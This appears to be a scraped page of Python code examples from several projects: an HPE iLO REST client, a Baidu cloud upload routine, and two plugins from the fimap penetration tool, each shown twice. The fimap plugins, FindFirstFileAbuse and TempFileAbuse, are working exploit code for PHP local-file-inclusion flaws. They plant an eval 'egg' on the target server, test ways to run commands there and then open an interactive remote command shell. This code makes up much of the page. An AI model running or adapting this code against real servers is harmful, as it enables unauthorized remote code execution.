                    LOGGER.error('Error occur while decompressing body: %s', \
                                                                        excp)
                    raise DecompressResponseError()
            except Exception as excp:
                if isinstance(excp, DecompressResponseError):
                    raise

                LOGGER.info('Retrying %s [%s]'% (path, excp))
                time.sleep(1)

                self.__init_connection()
                continue
            else:
                break

        self.__destroy_connection()
        if attempts < self.MAX_RETRY:
            if logging.getLogger().isEnabledFor(logging.DEBUG):
                headerstr = ''

                for header in restresp._http_response.msg.headers:
                    headerstr += '\t' + header.rstrip() + '\n'

                try:
                    LOGGER.debug('HTTP RESPONSE for %s:\nCode: %s\nHeaders:\n' \
                             '%s\nBody Response of %s: %s'%\
                             (restresp.request.path,\
                            str(restresp._http_response.status)+ ' ' + \
                            restresp._http_response.reason, \
                            headerstr, restresp.request.path, restresp.read))
                except:
                    LOGGER.debug('HTTP RESPONSE:\nCode:%s', (restresp))

            return restresp
        else:
            raise RetriesExhaustedError()

Example 12

Project: python-ilorest-library
Source File: v1.py
View license
    def _rest_request(self, path='', method="GET", args=None, body=None,
                      headers=None, optionalpassword=None, providerheader=None):
        """Rest request for blob store client

        :param path: path within tree
        :type path: str
        :param method: method to be implemented
        :type method: str
        :param args: the arguments for method
        :type args: dict
        :param body: body payload for the rest call
        :type body: dict
        :param headers: provide additional headers
        :type headers: dict
        :param optionalpassword: provide password for authentication
        :type optionalpassword: str
        :param provideheader: provider id for the header
        :type providerheader: str
        :return: returns a RestResponse object

        """
        headers = self._get_req_headers(headers, providerheader, \
                                                            optionalpassword)

        if not self.is_redfish and self.default_prefix in path and \
                                                                path[-1] == '/':
            path = path[0:-1]
        elif self.is_redfish and self.default_prefix in path and \
                                                                path[-1] != '/':
            #TODO: Fix back
            path = path# + '/'
        else:
            pass

        reqpath = path.replace('//', '/')

        if body is not None:
            if isinstance(body, dict) or isinstance(body, list):
                headers['Content-Type'] = u'application/json'
                body = json.dumps(body)
            else:
                headers['Content-Type'] = u'application/x-www-form-urlencoded'
                body = urllib.urlencode(body)

            if method == 'PUT':
                resp = self._rest_request(path=path)

                try:
                    if resp.getheader('content-encoding') == 'gzip':
                        buf = StringIO()
                        gfile = gzip.GzipFile(mode='wb', fileobj=buf)

                        try:
                            gfile.write(str(body))
                        finally:
                            gfile.close()

                        compresseddata = buf.getvalue()
                        if compresseddata:
                            data = bytearray()
                            data.extend(buffer(compresseddata))
                            body = data
                except BaseException as excp:
                    LOGGER.error('Error occur while compressing body: %s', excp)
                    raise

            headers['Content-Length'] = len(body)

        if args:
            if method == 'GET':
                reqpath += '?' + urllib.urlencode(args)
            elif method == 'PUT' or method == 'POST' or method == 'PATCH':
                headers['Content-Type'] = u'application/x-www-form-urlencoded'
                body = urllib.urlencode(args)

        str1 = '%s %s %s\r\n' % (method, reqpath, \
                                            Blobstore2RestClient._http_vsn_str)

        str1 += 'Host: \r\n'
        str1 += 'Accept-Encoding: identity\r\n'
        for header, value in headers.iteritems():
            str1 += '%s: %s\r\n' % (header, value)

        str1 += '\r\n'

        if body and len(body) > 0:
            if isinstance(body, bytearray):
                str1 = str1.encode("ASCII") + body
            else:
                str1 += body

        bs2 = BlobStore2()
        if not isinstance(str1, bytearray):
            str1 = str1.encode("ASCII")
        if logging.getLogger().isEnabledFor(logging.DEBUG):
            try:
                LOGGER.debug('Blobstore REQUEST: %s\n\tPATH: %s\n\tBODY: %s'% \
                         (method, path, body))
            except:
                LOGGER.debug('Blobstore REQUEST: %s\n\tPATH: %s\n\tBODY: %s'% \
                         (method, path, 'binary body'))                

        inittime = time.clock()
        resp_txt = bs2.rest_immediate(str1)
        endtime = time.clock()

        LOGGER.info("iLO Response Time to %s: %s secs."% \
                                                (path, str(endtime-inittime)))
        #Dummy response to support a bad host response
        if len(resp_txt) == 0:
            resp_txt = "HTTP/1.1 500 Not Found\r\nAllow: " \
            "GET\r\nCache-Control: no-cache\r\nContent-length: " \
            "0\r\nContent-type: text/html\r\nDate: Tues, 1 Apr 2025 " \
            "00:00:01 GMT\r\nServer: " \
            "HP-iLO-Server/1.30\r\nX_HP-CHRP-Service-Version: 1.0.3\r\n\r\n\r\n"

        restreq = RestRequest(reqpath, method=method, body=body)
        rest_response = RisRestResponse(restreq, resp_txt)

        if rest_response.status in range(300, 399) and \
                                                    rest_response.status != 304:
            newloc = rest_response.getheader("location")
            newurl = urlparse2.urlparse(newloc)

            rest_response = self._rest_request(newurl.path, method, args, \
                               body, headers, optionalpassword, providerheader)

        try:
            if rest_response.getheader('content-encoding') == 'gzip':
                compressedfile = StringIO(rest_response.text)
                decompressedfile = gzip.GzipFile(fileobj=compressedfile)
                rest_response.text = decompressedfile.read()
        except StandardError:
            pass
        if logging.getLogger().isEnabledFor(logging.DEBUG):
            headerstr = ''
            for header in rest_response._http_response.msg.headers:
                headerstr += '\t' + header.rstrip() + '\n'
            try:
                LOGGER.debug('Blobstore RESPONSE for %s:\nCode: %s\nHeaders:\n%s'\
                         '\nBody of %s: %s'%\
                         (rest_response.request.path,\
                        str(rest_response._http_response.status)+ ' ' + \
                        rest_response._http_response.reason, \
                        headerstr, rest_response.request.path, rest_response.read))
            except:
                LOGGER.debug('Blobstore RESPONSE for %s:\nCode:%s'% \
                             (rest_response.request.path, rest_response))
        return rest_response

Example 13

Project: fimap
Source File: FindFirstFileAbuse.py
View license
    def plugin_callback_handler(self, callbackstring, haxhelper):
        if (callbackstring == "FindFirstFileAbuse.hax"):
            inp = -1
            
            while(inp != "q" and inp != "Q"):
                options = []
                
                urlDisplay = self.remotetmpdir
                
                if (urlDisplay == ""):
                    urlDisplay = "<None - Define one!>"
                
                options.append("1. Enter Path of TempDir")
                options.append("2. AutoProbe for TempDir")
                options.append("   Current TempDir: %s" %(urlDisplay))
                options.append("3. Change number of attempts (Current: %d)" %(self.maxAttempts))
                options.append("4. Change number of threads (Current: %d)" %(self.maxThreads))
                options.append("5. Change eggdrop location (Current: %s)" %(self.egg))
                options.append("6. Change your lottery ticket (Current: %s)" %(self.lotteryTicket))
                options.append("7. Launch attack")
                options.append("0. WTF is this shit?")
                options.append("q. Back to fimap")
                
                haxhelper.drawBox("FindFirstFile Glitch", options)
                inp = raw_input("Choose action: ")
                
                try:
                    idx = int(inp)
                    
                    if (idx == 1):
                        self.remotetmpdir = raw_input("Please type in the complete URL of the Remote Temporary Directory: ")
                        print "Remote Temporary Directory URL changed to: %s" %(self.remotetmpdir)
                    
                    elif (idx == 2):
                        print "AutoProbe not implemented right now :("
                        
                    elif (idx == 3):
                        tmp = raw_input("Please type in the number of attempts you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less attempts are not smart bro."
                            else:
                                self.maxAttempts = n
                                print "MaxAttempts changed to: %s" %(self.maxAttemps)
                        except:
                            print "Invalid number."
                        
                    elif (idx == 4):
                        tmp = raw_input("Please type in the number of threads you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less threads are not smart bro."
                            else:
                                self.maxThreads = n
                                print "MaxThreads changed to: %s" %(self.maxThreads)
                        except:
                            print "Invalid number."
                        
                    elif (idx == 5):
                        self.egg = raw_input("Please type location where to try to drop the egg.\nPlease no trailing '\\' :")
                        print "EggDrop location changed to: %s" %(self.egg)
                    
                    elif (idx == 6):
                        self.lotteryTicket = raw_input("Please type in your new lottery ticket: ")
                        print "LotteryTicket changed to: %s" %(self.lotteryTicket)
                    
                                        
                    elif(idx == 0):
                        print "This plugin uses a bug in the windows PHP versions which allows basicly to"
                        print "use jokers while including files."
                        print "You have to know the absolute path to the temporary directory where PHP"
                        print "will store its temporary files."
                        print "The plugin will then upload specially crafted files and tries to include"
                        print "them using your 'LotteryTicket' you can provide."
                        print "Your 'LotteryTicket' should contain a FindFirstFile compatible wildcard."
                        print "Print by default the 'LotteryTicket' is phpA<tmp which you can basicly translate to:"
                        print "'phpA*tmp'."
                        print "Once the plugin managed to exploit this vulnerability you will be prompted to the"
                        print "fimap lite shell which you should replace with your own shell asap."
                    
                    elif (idx == 7):
                        if (self.remotetmpdir != None and self.remotetmpdir != ""):
                            print "Launching attack..."
                            path, postdata, header, trash = haxhelper.getHaxDataForCustomFile(self.remotetmpdir + "\\" + self.lotteryTicket)
                            
                            if (self.createEgg(haxhelper, path, postdata)):
                                # SUCCESSFULLY CREATED EVAL SHELL AT self.egg
                            
                                shell_banner = "fimap_eggshell> "
                                
                                lang = haxhelper.langClass
                                
                                quiz, answer = lang.generateQuiz()
                                #Since it's eval'd we remove the stuff...
                                quiz = quiz.replace("<?php", "")
                                quiz = quiz.replace("?>", "")
                                
                                path, postdata, header, trash = haxhelper.getHaxDataForCustomFile(self.egg)
                                
                                domain = urlparse.urlsplit(haxhelper.getURL())[1]
                                url = urlparse.urljoin("http://" + domain, path)
                                
                                post = ""
                                
                                if (postdata != ""):
                                    post = postdata + "&"
                                
                                post += urllib.urlencode({"data": base64.b64encode(quiz)})
                                res = haxhelper.doRequest(url, post, header)
                                
                                if (res.find(answer) != -1):
                                    print "PHP Code Injection thru EggDrop works!"
                                    xmlconfig = haxhelper.parent_codeinjector.config["XML2CONFIG"]
                                    shellquiz, shellanswer = xmlconfig.generateShellQuiz(haxhelper.isUnix())
                                    shell_test_code = shellquiz
                                    shell_test_result = shellanswer 
                                    for item in self.lang.getExecMethods():
                                        name = item.getName()
                                        payload = None
                                        if (item.isUnix() and haxhelper.isUnix()) or (item.isWindows() and haxhelper.isWindows()):
                                            self._log("Testing execution thru '%s'..."%(name), self.LOG_INFO)
                                            code = item.generatePayload(shell_test_code)
                                            code = code.replace("<?php", "")
                                            code = code.replace("?>", "")
                                            testload = urllib.urlencode({"data": base64.b64encode(code)})
                                            
                                            if (postdata != ""):
                                                testload = "%s&%s" %(postdata, testload)
                                            code = self.doPostRequest(url, testload, header)
                                            
                                            if code != None and code.find(shell_test_result) != -1:
                                                working_shell = item
                                                self._log("Execution thru '%s' works!"%(name), self.LOG_ALWAYS)
                                                
                                                print "--------------------------------------------------------------------"
                                                print "Welcome to the fimap_eggshell!"
                                                print "This is a lite version of the fimap shell."
                                                print "Consider this shell as a temporary shell you should get rid of asap."
                                                print "Upload your own shell to be on the safe side."
                                                print "--------------------------------------------------------------------"  
                                                
                                                payload = raw_input(shell_banner)
                                                
                                                while (payload != "q" and payload != "Q"):
                                                    payload = item.generatePayload(payload)
                                                    payload = payload.replace("<?php", "")
                                                    payload = payload.replace("?>", "")
                                                    payload = urllib.urlencode({"data": base64.b64encode(payload)})
                                                    if (postdata != ""):
                                                        payload = "%s&%s" %(postdata, payload)
                                                    code = self.doPostRequest(url, payload, header)
                                                    print code
                                                    payload = raw_input(shell_banner)
                                                
                                                return
                                        else:
                                            self._log("Skipping execution method '%s'..."%(name), self.LOG_DEBUG)
                                else:
                                    print "PHP Code Injection thru EggDrop failed :("
                                    return
                            
                        else:
                            print "No Remote Temporary Directory defined."
                            
                except (ValueError):
                    pass

Example 14

Project: fimap
Source File: FindFirstFileAbuse.py
View license
    def plugin_callback_handler(self, callbackstring, haxhelper):
        if (callbackstring == "FindFirstFileAbuse.hax"):
            inp = -1
            
            while(inp != "q" and inp != "Q"):
                options = []
                
                urlDisplay = self.remotetmpdir
                
                if (urlDisplay == ""):
                    urlDisplay = "<None - Define one!>"
                
                options.append("1. Enter Path of TempDir")
                options.append("2. AutoProbe for TempDir")
                options.append("   Current TempDir: %s" %(urlDisplay))
                options.append("3. Change number of attempts (Current: %d)" %(self.maxAttempts))
                options.append("4. Change number of threads (Current: %d)" %(self.maxThreads))
                options.append("5. Change eggdrop location (Current: %s)" %(self.egg))
                options.append("6. Change your lottery ticket (Current: %s)" %(self.lotteryTicket))
                options.append("7. Launch attack")
                options.append("0. WTF is this shit?")
                options.append("q. Back to fimap")
                
                haxhelper.drawBox("FindFirstFile Glitch", options)
                inp = raw_input("Choose action: ")
                
                try:
                    idx = int(inp)
                    
                    if (idx == 1):
                        self.remotetmpdir = raw_input("Please type in the complete URL of the Remote Temporary Directory: ")
                        print "Remote Temporary Directory URL changed to: %s" %(self.remotetmpdir)
                    
                    elif (idx == 2):
                        print "AutoProbe not implemented right now :("
                        
                    elif (idx == 3):
                        tmp = raw_input("Please type in the number of attempts you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less attempts are not smart bro."
                            else:
                                self.maxAttempts = n
                                print "MaxAttempts changed to: %s" %(self.maxAttemps)
                        except:
                            print "Invalid number."
                        
                    elif (idx == 4):
                        tmp = raw_input("Please type in the number of threads you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less threads are not smart bro."
                            else:
                                self.maxThreads = n
                                print "MaxThreads changed to: %s" %(self.maxThreads)
                        except:
                            print "Invalid number."
                        
                    elif (idx == 5):
                        self.egg = raw_input("Please type location where to try to drop the egg.\nPlease no trailing '\\' :")
                        print "EggDrop location changed to: %s" %(self.egg)
                    
                    elif (idx == 6):
                        self.lotteryTicket = raw_input("Please type in your new lottery ticket: ")
                        print "LotteryTicket changed to: %s" %(self.lotteryTicket)
                    
                                        
                    elif(idx == 0):
                        print "This plugin uses a bug in the windows PHP versions which allows basicly to"
                        print "use jokers while including files."
                        print "You have to know the absolute path to the temporary directory where PHP"
                        print "will store its temporary files."
                        print "The plugin will then upload specially crafted files and tries to include"
                        print "them using your 'LotteryTicket' you can provide."
                        print "Your 'LotteryTicket' should contain a FindFirstFile compatible wildcard."
                        print "Print by default the 'LotteryTicket' is phpA<tmp which you can basicly translate to:"
                        print "'phpA*tmp'."
                        print "Once the plugin managed to exploit this vulnerability you will be prompted to the"
                        print "fimap lite shell which you should replace with your own shell asap."
                    
                    elif (idx == 7):
                        if (self.remotetmpdir != None and self.remotetmpdir != ""):
                            print "Launching attack..."
                            path, postdata, header, trash = haxhelper.getHaxDataForCustomFile(self.remotetmpdir + "\\" + self.lotteryTicket)
                            
                            if (self.createEgg(haxhelper, path, postdata)):
                                # SUCCESSFULLY CREATED EVAL SHELL AT self.egg
                            
                                shell_banner = "fimap_eggshell> "
                                
                                lang = haxhelper.langClass
                                
                                quiz, answer = lang.generateQuiz()
                                #Since it's eval'd we remove the stuff...
                                quiz = quiz.replace("<?php", "")
                                quiz = quiz.replace("?>", "")
                                
                                path, postdata, header, trash = haxhelper.getHaxDataForCustomFile(self.egg)
                                
                                domain = urlparse.urlsplit(haxhelper.getURL())[1]
                                url = urlparse.urljoin("http://" + domain, path)
                                
                                post = ""
                                
                                if (postdata != ""):
                                    post = postdata + "&"
                                
                                post += urllib.urlencode({"data": base64.b64encode(quiz)})
                                res = haxhelper.doRequest(url, post, header)
                                
                                if (res.find(answer) != -1):
                                    print "PHP Code Injection thru EggDrop works!"
                                    xmlconfig = haxhelper.parent_codeinjector.config["XML2CONFIG"]
                                    shellquiz, shellanswer = xmlconfig.generateShellQuiz(haxhelper.isUnix())
                                    shell_test_code = shellquiz
                                    shell_test_result = shellanswer 
                                    for item in self.lang.getExecMethods():
                                        name = item.getName()
                                        payload = None
                                        if (item.isUnix() and haxhelper.isUnix()) or (item.isWindows() and haxhelper.isWindows()):
                                            self._log("Testing execution thru '%s'..."%(name), self.LOG_INFO)
                                            code = item.generatePayload(shell_test_code)
                                            code = code.replace("<?php", "")
                                            code = code.replace("?>", "")
                                            testload = urllib.urlencode({"data": base64.b64encode(code)})
                                            
                                            if (postdata != ""):
                                                testload = "%s&%s" %(postdata, testload)
                                            code = self.doPostRequest(url, testload, header)
                                            
                                            if code != None and code.find(shell_test_result) != -1:
                                                working_shell = item
                                                self._log("Execution thru '%s' works!"%(name), self.LOG_ALWAYS)
                                                
                                                print "--------------------------------------------------------------------"
                                                print "Welcome to the fimap_eggshell!"
                                                print "This is a lite version of the fimap shell."
                                                print "Consider this shell as a temporary shell you should get rid of asap."
                                                print "Upload your own shell to be on the safe side."
                                                print "--------------------------------------------------------------------"  
                                                
                                                payload = raw_input(shell_banner)
                                                
                                                while (payload != "q" and payload != "Q"):
                                                    payload = item.generatePayload(payload)
                                                    payload = payload.replace("<?php", "")
                                                    payload = payload.replace("?>", "")
                                                    payload = urllib.urlencode({"data": base64.b64encode(payload)})
                                                    if (postdata != ""):
                                                        payload = "%s&%s" %(postdata, payload)
                                                    code = self.doPostRequest(url, payload, header)
                                                    print code
                                                    payload = raw_input(shell_banner)
                                                
                                                return
                                        else:
                                            self._log("Skipping execution method '%s'..."%(name), self.LOG_DEBUG)
                                else:
                                    print "PHP Code Injection thru EggDrop failed :("
                                    return
                            
                        else:
                            print "No Remote Temporary Directory defined."
                            
                except (ValueError):
                    pass

Example 15

Project: fimap
Source File: TempFileAbuse.py
View license
    def plugin_callback_handler(self, callbackstring, haxhelper):
        if (callbackstring == "TempFileAbuse.hax"):
            
            print "-----------------------------------------------------------------------------"
            print "This plugin wouldn't be possible without the hard research of"
            print "     Gynvael Coldwind (http://gynvael.coldwind.pl)"
            print "      and"
            print "     Insomnia Security (http://insomniasec.com)"
            print "since it's based on this paper:"
            print "http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf"
            print "-----------------------------------------------------------------------------"
            
            inp = -1
            
            while(inp != "q" and inp != "Q"):
                options = []
                
                urlDisplay = self.phpinfourl
                
                if (urlDisplay == ""):
                    urlDisplay = "<None - Define one!>"
                
                options.append("1. Enter URL of PHPInfo()")
                options.append("2. AutoProbe for PHPInfo()")
                options.append("   Current URL: %s" %(urlDisplay))
                options.append("3. Change number of attempts (Current: %d)" %(self.maxAttempts))
                options.append("4. Change number of threads (Current: %d)" %(self.maxThreads))
                options.append("5. Change eggdrop location (Current: %s)" %(self.egg))
                options.append("6. Change number of trash to append (Current: %s)" %(self.trashFactor))
                options.append("7. Launch attack")
                options.append("q. Back to fimap")
                
                haxhelper.drawBox("PHPInfo Coldwind/Insomnia Glitch", options)
                inp = raw_input("Choose action: ")
                
                try:
                    idx = int(inp)
                    
                    if (idx == 1):
                        self.phpinfourl = raw_input("Please type in the complete URL of the PHPInfo() file: ")
                        print "PHPInfo() URL changed to: %s" %(self.phpinfourl)
                    
                    elif (idx == 2):
                        print "AutoProbe not implemented right now :("
                        
                    elif (idx == 3):
                        tmp = raw_input("Please type in the number of attempts you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less attempts are not smart bro."
                            else:
                                self.maxAttempts = n
                                print "MaxAttempts changed to: %s" %(self.maxAttemps)
                        except:
                            print "Invalid number."
                        
                    elif (idx == 4):
                        tmp = raw_input("Please type in the number of threads you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less threads are not smart bro."
                            else:
                                self.maxThreads = n
                                print "MaxThreads changed to: %s" %(self.maxThreads)
                        except:
                            print "Invalid number."
                        
                    if (idx == 5):
                        self.egg = raw_input("Please type location where to try to drop the egg: ")
                        print "EggDrop location changed to: %s" %(self.egg)
                    
                    elif (idx == 6):
                        tmp = raw_input("Please type in the number of trash to append: ")
                        try:
                            n = int(tmp)
                            if (n < 0):
                                print "WTH. Less than zero trash is not possible. Trust me I tried it hard."
                            else:
                                self.trashFactor = n
                                print "TrashFactor changed to: %s" %(self.trashFactor)
                        except:
                            print "Invalid number."
                    
                    if (idx == 7):
                        if (self.phpinfourl != None and self.phpinfourl != ""):
                            print "Checking if the URL you provided is really a PHPInfo file..."
                            code = self.doGetRequest(self.phpinfourl)
                            if (code.find("alt=\"PHP Logo\"") == -1):
                                print "The URL '%s' is not a PHP info file! :(" %(self.phpinfourl)
                                return
                            print "Launching attack..."
                            if (self.createEgg(haxhelper)):
                                # SUCCESSFULLY CREATED EVAL SHELL AT self.egg
                            
                                shell_banner = "fimap_eggshell> "
                                
                                lang = haxhelper.langClass
                                
                                quiz, answer = lang.generateQuiz()
                                #Since it's eval'd we remove the stuff...
                                quiz = quiz.replace("<?php", "")
                                quiz = quiz.replace("?>", "")
                            
                                path, postdata, header, trash = haxhelper.getHaxDataForCustomFile(self.egg)
                                
                                domain = urlparse.urlsplit(self.phpinfourl)[1]
                                url = urlparse.urljoin("http://" + domain, path)
                                
                                post = ""
                                
                                if (postdata != ""):
                                    post = postdata + "&"
                                
                                post += urllib.urlencode({"data": base64.b64encode(quiz)})
                                res = haxhelper.doRequest(url, post, header)
                                
                                if (res == answer):
                                    print "PHP Code Injection thru EggDrop works!"
                                    xmlconfig = haxhelper.parent_codeinjector.config["XML2CONFIG"]
                                    shellquiz, shellanswer = xmlconfig.generateShellQuiz(haxhelper.isUnix)
                                    shell_test_code = shellquiz
                                    shell_test_result = shellanswer 
                                    for item in self.lang.getExecMethods():
                                        name = item.getName()
                                        payload = None
                                        if (item.isUnix() and haxhelper.isUnix) or (item.isWindows() and not haxhelper.isUnix):
                                            self._log("Testing execution thru '%s'..."%(name), self.LOG_INFO)
                                            code = item.generatePayload(shell_test_code)
                                            code = code.replace("<?php", "")
                                            code = code.replace("?>", "")
                                            testload = urllib.urlencode({"data": base64.b64encode(code)})
                                            
                                            if (postdata != ""):
                                                testload = "%s&%s" %(postdata, testload)
                                            code = self.doPostRequest(url, testload, header)
                                            
                                            if code != None and code.find(shell_test_result) != -1:
                                                working_shell = item
                                                self._log("Execution thru '%s' works!"%(name), self.LOG_ALWAYS)
                                                
                                                print "--------------------------------------------------------------------"
                                                print "Welcome to the fimap_eggshell!"
                                                print "This is a lite version of the fimap shell."
                                                print "Consider this shell as a temporary shell you should get rid of asap."
                                                print "Upload your own shell to be on the safe side."
                                                print "--------------------------------------------------------------------"  
                                                
                                                payload = raw_input(shell_banner)
                                                
                                                while (payload != "q" and payload != "Q"):
                                                    payload = item.generatePayload(payload)
                                                    payload = payload.replace("<?php", "")
                                                    payload = payload.replace("?>", "")
                                                    payload = urllib.urlencode({"data": base64.b64encode(payload)})
                                                    if (postdata != ""):
                                                        payload = "%s&%s" %(postdata, payload)
                                                    code = self.doPostRequest(url, payload, header)
                                                    print code
                                                    payload = raw_input(shell_banner)
                                                
                                                return
                                        else:
                                            self._log("Skipping execution method '%s'..."%(name), self.LOG_DEBUG)
                                else:
                                    print "PHP Code Injection thru EggDrop failed :("
                                    return
                            
                        else:
                            print "No PHPInfo() URL defined."
                            
                except (ValueError):
                    pass

Example 16

Project: fimap
Source File: TempFileAbuse.py
View license
    def plugin_callback_handler(self, callbackstring, haxhelper):
        if (callbackstring == "TempFileAbuse.hax"):
            
            print "-----------------------------------------------------------------------------"
            print "This plugin wouldn't be possible without the hard research of"
            print "     Gynvael Coldwind (http://gynvael.coldwind.pl)"
            print "      and"
            print "     Insomnia Security (http://insomniasec.com)"
            print "since it's based on this paper:"
            print "http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf"
            print "-----------------------------------------------------------------------------"
            
            inp = -1
            
            while(inp != "q" and inp != "Q"):
                options = []
                
                urlDisplay = self.phpinfourl
                
                if (urlDisplay == ""):
                    urlDisplay = "<None - Define one!>"
                
                options.append("1. Enter URL of PHPInfo()")
                options.append("2. AutoProbe for PHPInfo()")
                options.append("   Current URL: %s" %(urlDisplay))
                options.append("3. Change number of attempts (Current: %d)" %(self.maxAttempts))
                options.append("4. Change number of threads (Current: %d)" %(self.maxThreads))
                options.append("5. Change eggdrop location (Current: %s)" %(self.egg))
                options.append("6. Change number of trash to append (Current: %s)" %(self.trashFactor))
                options.append("7. Launch attack")
                options.append("q. Back to fimap")
                
                haxhelper.drawBox("PHPInfo Coldwind/Insomnia Glitch", options)
                inp = raw_input("Choose action: ")
                
                try:
                    idx = int(inp)
                    
                    if (idx == 1):
                        self.phpinfourl = raw_input("Please type in the complete URL of the PHPInfo() file: ")
                        print "PHPInfo() URL changed to: %s" %(self.phpinfourl)
                    
                    elif (idx == 2):
                        print "AutoProbe not implemented right now :("
                        
                    elif (idx == 3):
                        tmp = raw_input("Please type in the number of attempts you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less attempts are not smart bro."
                            else:
                                self.maxAttempts = n
                                print "MaxAttempts changed to: %s" %(self.maxAttemps)
                        except:
                            print "Invalid number."
                        
                    elif (idx == 4):
                        tmp = raw_input("Please type in the number of threads you wish: ")
                        try:
                            n = int(tmp)
                            if (n <= 0):
                                print "WTH. Zero or less threads are not smart bro."
                            else:
                                self.maxThreads = n
                                print "MaxThreads changed to: %s" %(self.maxThreads)
                        except:
                            print "Invalid number."
                        
                    if (idx == 5):
                        self.egg = raw_input("Please type location where to try to drop the egg: ")
                        print "EggDrop location changed to: %s" %(self.egg)
                    
                    elif (idx == 6):
                        tmp = raw_input("Please type in the number of trash to append: ")
                        try:
                            n = int(tmp)
                            if (n < 0):
                                print "WTH. Less than zero trash is not possible. Trust me I tried it hard."
                            else:
                                self.trashFactor = n
                                print "TrashFactor changed to: %s" %(self.trashFactor)
                        except:
                            print "Invalid number."
                    
                    if (idx == 7):
                        if (self.phpinfourl != None and self.phpinfourl != ""):
                            print "Checking if the URL you provided is really a PHPInfo file..."
                            code = self.doGetRequest(self.phpinfourl)
                            if (code.find("alt=\"PHP Logo\"") == -1):
                                print "The URL '%s' is not a PHP info file! :(" %(self.phpinfourl)
                                return
                            print "Launching attack..."
                            if (self.createEgg(haxhelper)):
                                # SUCCESSFULLY CREATED EVAL SHELL AT self.egg
                            
                                shell_banner = "fimap_eggshell> "
                                
                                lang = haxhelper.langClass
                                
                                quiz, answer = lang.generateQuiz()
                                #Since it's eval'd we remove the stuff...
                                quiz = quiz.replace("<?php", "")
                                quiz = quiz.replace("?>", "")
                            
                                path, postdata, header, trash = haxhelper.getHaxDataForCustomFile(self.egg)
                                
                                domain = urlparse.urlsplit(self.phpinfourl)[1]
                                url = urlparse.urljoin("http://" + domain, path)
                                
                                post = ""
                                
                                if (postdata != ""):
                                    post = postdata + "&"
                                
                                post += urllib.urlencode({"data": base64.b64encode(quiz)})
                                res = haxhelper.doRequest(url, post, header)
                                
                                if (res == answer):
                                    print "PHP Code Injection thru EggDrop works!"
                                    xmlconfig = haxhelper.parent_codeinjector.config["XML2CONFIG"]
                                    shellquiz, shellanswer = xmlconfig.generateShellQuiz(haxhelper.isUnix)
                                    shell_test_code = shellquiz
                                    shell_test_result = shellanswer 
                                    for item in self.lang.getExecMethods():
                                        name = item.getName()
                                        payload = None
                                        if (item.isUnix() and haxhelper.isUnix) or (item.isWindows() and not haxhelper.isUnix):
                                            self._log("Testing execution thru '%s'..."%(name), self.LOG_INFO)
                                            code = item.generatePayload(shell_test_code)
                                            code = code.replace("<?php", "")
                                            code = code.replace("?>", "")
                                            testload = urllib.urlencode({"data": base64.b64encode(code)})
                                            
                                            if (postdata != ""):
                                                testload = "%s&%s" %(postdata, testload)
                                            code = self.doPostRequest(url, testload, header)
                                            
                                            if code != None and code.find(shell_test_result) != -1:
                                                working_shell = item
                                                self._log("Execution thru '%s' works!"%(name), self.LOG_ALWAYS)
                                                
                                                print "--------------------------------------------------------------------"
                                                print "Welcome to the fimap_eggshell!"
                                                print "This is a lite version of the fimap shell."
                                                print "Consider this shell as a temporary shell you should get rid of asap."
                                                print "Upload your own shell to be on the safe side."
                                                print "--------------------------------------------------------------------"  
                                                
                                                payload = raw_input(shell_banner)
                                                
                                                while (payload != "q" and payload != "Q"):
                                                    payload = item.generatePayload(payload)
                                                    payload = payload.replace("<?php", "")
                                                    payload = payload.replace("?>", "")
                                                    payload = urllib.urlencode({"data": base64.b64encode(payload)})
                                                    if (postdata != ""):
                                                        payload = "%s&%s" %(postdata, payload)
                                                    code = self.doPostRequest(url, payload, header)
                                                    print code
                                                    payload = raw_input(shell_banner)
                                                
                                                return
                                        else:
                                            self._log("Skipping execution method '%s'..."%(name), self.LOG_DEBUG)
                                else:
                                    print "PHP Code Injection thru EggDrop failed :("
                                    return
                            
                        else:
                            print "No PHPInfo() URL defined."
                            
                except (ValueError):
                    pass

Example 17

Project: baidu_http_pan
Source File: baiduyun.py
View license
    def upload_yunpan(self,filename,destdir):
        if self.bdstoken == '' :
            sys.exit(1)


        if self.BDUSS == '' :
            logger.info("login failed,please relogin")
            sys.exit(1)
        #记录开始时间
        starttime = time.time()
        logger.debug(starttime)
        
        # 上传文件,使用post方法,
        #   参数 1 cookie中的BDUSS,
        #  post文件需要encode变换,所以采用curl命令方式,防止python处理文件超大出现异常,
        #
        upload_file_url = 'http://c.pcs.baidu.com/rest/2.0/pcs/file?' + urllib.urlencode({'BDUSS':self.BDUSS,
                    'method':'upload', 'type':'tmpfile', 'app_id':'250528', })
        logger.debug(upload_file_url)

        # fields = []
        # files = [('Filedata', filename, open(filename, 'rb'))]

        # iterate and write chunk in a socket
        # content_type, body = MultipartFormdataEncoder().encode(fields, files)
        # headers = {
        #     'Content-Type': content_type,
        #     'Content-Length': str(len(body)),
        #     }
        # req = urllib2.Request(upload_file_url,body,headers=headers)
        # page = urllib2.urlopen(req)

        curl_command = [ 'curl', '-b', self.cookiename, '-F', "[email protected]%s" % filename,
                    upload_file_url ]
        logger.debug(curl_command)
        
        #处理curl命令
        from subprocess import Popen, PIPE
        process = Popen(curl_command, stdout=PIPE)
        result = process.stdout.read()
        process.wait()              # Wait for it to complete

        #抽取返回字符串,字符串含百度云检测文件的md5值,和requestid
        file_md5= json.loads(result)['md5']

        logger.debug("update website result string:%s",result)
        logger.debug("update file md5 sume:%s",file_md5)

        #
        # 将刚刚上传的文件创建到自己的云目录。
        # 参数 1 bdstoken
        #     2 要保存的文件的目录
        #     3 文件的大小
        #     4 文件的md5值
        create_file_url = 'http://pan.baidu.com/api/create?' + urllib.urlencode({ 'a':'commit',
                            'channel':'chunlei', 'clienttype':'0', 'web':'1',
                            'bdstoken':self.bdstoken,
                        })
        logger.debug("create file file url:%s",create_file_url)

        post_data = urllib.urlencode( {
             'path':destdir + '/' + os.path.basename(filename),
            'isdir':'0',
